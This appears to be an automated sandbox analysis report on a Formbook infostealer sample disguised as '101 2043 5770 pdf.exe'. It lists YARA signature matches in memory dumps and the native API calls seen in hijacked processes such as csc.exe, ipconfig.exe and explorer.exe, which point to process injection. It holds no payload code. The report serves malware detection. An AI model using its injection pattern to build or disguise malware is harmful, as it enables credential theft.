Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041A330 NtCreateFile, 6_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041A3E0 NtReadFile, 6_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041A460 NtClose, 6_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041A510 NtAllocateVirtualMemory, 6_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041A2EA NtCreateFile, 6_2_0041A2EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0041A32B NtCreateFile, 6_2_0041A32B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2DD0 NtDelayExecution,LdrInitializeThunk, 6_2_059A2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_059A2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_059A2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_059A2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_059A2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_059A2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2F90 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_059A2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2FB0 NtResumeThread,LdrInitializeThunk, 6_2_059A2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2FE0 NtCreateFile,LdrInitializeThunk, 6_2_059A2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2F30 NtCreateSection,LdrInitializeThunk, 6_2_059A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_059A2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_059A2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_059A2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2B60 NtClose,LdrInitializeThunk, 6_2_059A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2AD0 NtReadFile,LdrInitializeThunk, 6_2_059A2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A35C0 NtCreateMutant, 6_2_059A35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A4650 NtSuspendThread, 6_2_059A4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A3090 NtSetValueKey, 6_2_059A3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A3010 NtOpenDirectoryObject, 6_2_059A3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A4340 NtSetContextThread, 6_2_059A4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2DB0 NtEnumerateKey, 6_2_059A2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A3D10 NtOpenProcessToken, 6_2_059A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2D00 NtSetInformationFile, 6_2_059A2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A3D70 NtOpenThread, 6_2_059A3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2CC0 NtQueryVirtualMemory, 6_2_059A2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2CF0 NtOpenProcess, 6_2_059A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2C00 NtQueryInformationProcess, 6_2_059A2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2C60 NtCreateKey, 6_2_059A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2FA0 NtQuerySection, 6_2_059A2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2F60 NtCreateProcessEx, 6_2_059A2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2EE0 NtQueueApcThread, 6_2_059A2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2E30 NtWriteVirtualMemory, 6_2_059A2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A39B0 NtGetContextThread, 6_2_059A39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2B80 NtQueryInformationFile, 6_2_059A2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2BA0 NtEnumerateValueKey, 6_2_059A2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2BE0 NtQueryValueKey, 6_2_059A2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2AB0 NtWaitForSingleObject, 6_2_059A2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2AF0 NtWriteFile, 6_2_059A2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0588A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose, 6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0588A042 NtQueryInformationProcess, 6_2_0588A042
Source: C:\Windows\explorer.exe Code function: 7_2_1124C232 NtCreateFile,NtReadFile, 7_2_1124C232
Source: C:\Windows\explorer.exe Code function: 7_2_1124DE12 NtProtectVirtualMemory, 7_2_1124DE12
Source: C:\Windows\explorer.exe Code function: 7_2_1124DE0A NtProtectVirtualMemory, 7_2_1124DE0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_036035C0 NtCreateMutant,LdrInitializeThunk, 9_2_036035C0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602B60 NtClose,LdrInitializeThunk, 9_2_03602B60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602AF0 NtWriteFile,LdrInitializeThunk, 9_2_03602AF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602AD0 NtReadFile,LdrInitializeThunk, 9_2_03602AD0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602F30 NtCreateSection,LdrInitializeThunk, 9_2_03602F30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602FE0 NtCreateFile,LdrInitializeThunk, 9_2_03602FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_03602EA0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602D00 NtSetInformationFile,LdrInitializeThunk, 9_2_03602D00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_03602D10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03602DF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602DD0 NtDelayExecution,LdrInitializeThunk, 9_2_03602DD0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602C60 NtCreateKey,LdrInitializeThunk, 9_2_03602C60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_03602C70
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_03602CA0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03604340 NtSetContextThread, 9_2_03604340
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03603010 NtOpenDirectoryObject, 9_2_03603010
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03603090 NtSetValueKey, 9_2_03603090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03604650 NtSuspendThread, 9_2_03604650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602BE0 NtQueryValueKey, 9_2_03602BE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602BF0 NtAllocateVirtualMemory, 9_2_03602BF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602BA0 NtEnumerateValueKey, 9_2_03602BA0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602B80 NtQueryInformationFile, 9_2_03602B80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602AB0 NtWaitForSingleObject, 9_2_03602AB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_036039B0 NtGetContextThread, 9_2_036039B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602F60 NtCreateProcessEx, 9_2_03602F60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602FA0 NtQuerySection, 9_2_03602FA0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602FB0 NtResumeThread, 9_2_03602FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602F90 NtProtectVirtualMemory, 9_2_03602F90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602E30 NtWriteVirtualMemory, 9_2_03602E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602EE0 NtQueueApcThread, 9_2_03602EE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602E80 NtReadVirtualMemory, 9_2_03602E80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03603D70 NtOpenThread, 9_2_03603D70
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602D30 NtUnmapViewOfSection, 9_2_03602D30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03603D10 NtOpenProcessToken, 9_2_03603D10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602DB0 NtEnumerateKey, 9_2_03602DB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602C00 NtQueryInformationProcess, 9_2_03602C00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602CF0 NtOpenProcess, 9_2_03602CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03602CC0 NtQueryVirtualMemory, 9_2_03602CC0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00C5A3E0 NtReadFile, 9_2_00C5A3E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00C5A330 NtCreateFile, 9_2_00C5A330
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00C5A460 NtClose, 9_2_00C5A460
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00C5A2EA NtCreateFile, 9_2_00C5A2EA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00C5A32B NtCreateFile, 9_2_00C5A32B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03989BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_03989BAF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0398A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03989DDD NtWriteVirtualMemory,NtResumeThread, 9_2_03989DDD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03989BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_03989BB2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0398A042 NtQueryInformationProcess, 9_2_0398A042
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7881480 0_2_00007FF7D7881480
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7882BA0 0_2_00007FF7D7882BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7869B70 0_2_00007FF7D7869B70
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7868900 0_2_00007FF7D7868900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7964740 0_2_00007FF7D7964740
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7884790 0_2_00007FF7D7884790
